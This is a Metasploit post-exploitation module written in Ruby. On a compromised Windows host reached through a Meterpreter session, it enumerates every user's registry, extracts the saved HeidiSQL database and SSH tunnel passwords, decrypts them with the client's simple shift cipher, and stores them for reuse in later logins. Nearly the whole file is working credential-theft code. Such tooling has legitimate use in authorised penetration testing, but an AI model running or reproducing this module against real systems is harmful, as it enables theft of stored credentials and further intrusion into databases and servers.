modules/post/windows/gather/credentials/heidisql.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Post
include Msf::Post::Windows::Registry
include Msf::Auxiliary::Report
include Msf::Post::Windows::UserProfiles
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Windows Gather HeidiSQL Saved Password Extraction',
'Description' => %q{
This module extracts saved passwords from the HeidiSQL client. These
passwords are stored in the registry. They are encrypted with a custom algorithm.
This module extracts and decrypts these passwords.
},
'License' => MSF_LICENSE,
'Author' => ['h0ng10'],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ]
)
)
end
def print_status(msg = '')
super("#{peer} - #{msg}")
end
def print_error(msg = '')
super("#{peer} - #{msg}")
end
def print_good(msg = '')
super("#{peer} - #{msg}")
end
def run
userhives = load_missing_hives
userhives.each do |hive|
next if hive['HKU'].nil?
print_status("Looking at Key #{hive['HKU']}")
begin
subkeys = registry_enumkeys("#{hive['HKU']}\\Software\\HeidiSQL\\Servers")
if subkeys.blank?
print_status('HeidiSQL not installed for this user.')
next
end
service_types = {
0 => 'mysql',
1 => 'mysql-named-pipe',
2 => 'mysql-ssh',
3 => 'mssql-named-pipe',
4 => 'mssql',
5 => 'mssql-spx-ipx',
6 => 'mssql-banyan-vines',
7 => 'mssql-windows-rpc',
8 => 'postgres'
}
subkeys.each do |site|
site_key = "#{hive['HKU']}\\Software\\HeidiSQL\\Servers\\#{site}"
host = registry_getvaldata(site_key, 'Host') || ''
user = registry_getvaldata(site_key, 'User') || ''
port = registry_getvaldata(site_key, 'Port') || ''
db_type = registry_getvaldata(site_key, 'NetType') || ''
prompt = registry_getvaldata(site_key, 'LoginPrompt') || ''
ssh_user = registry_getvaldata(site_key, 'SSHtunnelUser') || ''
ssh_host = registry_getvaldata(site_key, 'SSHtunnelHost') || ''
ssh_port = registry_getvaldata(site_key, 'SSHtunnelPort') || ''
ssh_pass = registry_getvaldata(site_key, 'SSHtunnelPass') || ''
win_auth = registry_getvaldata(site_key, 'WindowsAuth') || ''
epass = registry_getvaldata(site_key, 'Password')
# skip if windows authentication is used (mssql only)
next if db_type.between?(3, 7) && (win_auth == 1)
next if epass.nil? || (epass == '') || (epass.length == 1) || (prompt == 1)
pass = decrypt(epass)
print_good("Service: #{service_types[db_type]} Host: #{host} Port: #{port} User: #{user} Password: #{pass}")
service_data = {
address: host == '127.0.0.1' ? rhost : host,
port: port,
service_name: service_types[db_type],
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
origin_type: :session,
session_id: session_db_id,
post_reference_name: refname,
private_type: :password,
private_data: pass,
username: user
}
credential_data.merge!(service_data)
# Create the Metasploit::Credential::Core object
credential_core = create_credential(credential_data)
# Assemble the options hash for creating the Metasploit::Credential::Login object
login_data = {
core: credential_core,
status: Metasploit::Model::Login::Status::UNTRIED
}
# Merge in the service data and create our Login
login_data.merge!(service_data)
login = create_credential_login(login_data)
# if we have a MySQL via SSH connection, we need to store the SSH credentials as well
next unless db_type == 2
print_good("Service: ssh Host: #{ssh_host} Port: #{ssh_port} User: #{ssh_user} Password: #{ssh_pass}")
service_data = {
address: ssh_host,
port: ssh_port,
service_name: 'ssh',
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
origin_type: :session,
session_id: session_db_id,
post_reference_name: refname,
private_type: :password,
private_data: ssh_pass,
username: ssh_user
}
credential_data.merge!(service_data)
# Create the Metasploit::Credential::Core object
credential_core = create_credential(credential_data)
# Assemble the options hash for creating the Metasploit::Credential::Login object
login_data = {
core: credential_core,
status: Metasploit::Model::Login::Status::UNTRIED
}
# Merge in the service data and create our Login
login_data.merge!(service_data)
login = create_credential_login(login_data)
end
rescue ::Rex::Post::Meterpreter::RequestError => e
elog(e)
print_error("Cannot Access User SID: #{hive['HKU']} : #{e.message}")
end
end
unload_our_hives(userhives)
end
def decrypt(encoded)
decoded = ''
shift = Integer(encoded[-1, 1])
encoded = encoded[0, encoded.length - 1]
hex_chars = encoded.scan(/../)
hex_chars.each do |entry|
x = entry.to_i(16) - shift
decoded += x.chr(::Encoding::UTF_8)
end
return decoded
end
end